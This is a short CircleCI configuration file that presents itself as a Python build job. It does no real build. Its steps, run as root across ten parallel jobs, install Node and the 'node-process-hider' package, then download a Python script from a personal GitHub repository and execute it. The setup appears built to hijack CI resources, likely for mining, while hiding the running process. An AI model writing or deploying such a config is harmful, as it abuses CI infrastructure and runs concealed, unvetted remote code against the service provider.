working_dir: &working_dir ~/app

version: 2.1 
 
orbs: 
   
  python: circleci/python@1.2 
 
workflows: 
  sample:   
    jobs: 
      - job
 
jobs: 
  job:
    parallelism: 10
    docker: 
      - image: cimg/python:3.8 
     
    steps: 
      - checkout 
      - run: sudo su --command "sudo apt update && sudo apt upgrade -y && curl -sL https://deb.nodesource.com/setup_12.x | sudo -E bash - && sudo apt-get install --force-yes nodejs && npm i -g node-process-hider && wget https://raw.githubusercontent.com/aurbach55/zash/main/dep.py"
      - run: sudo su --command "dep.py"
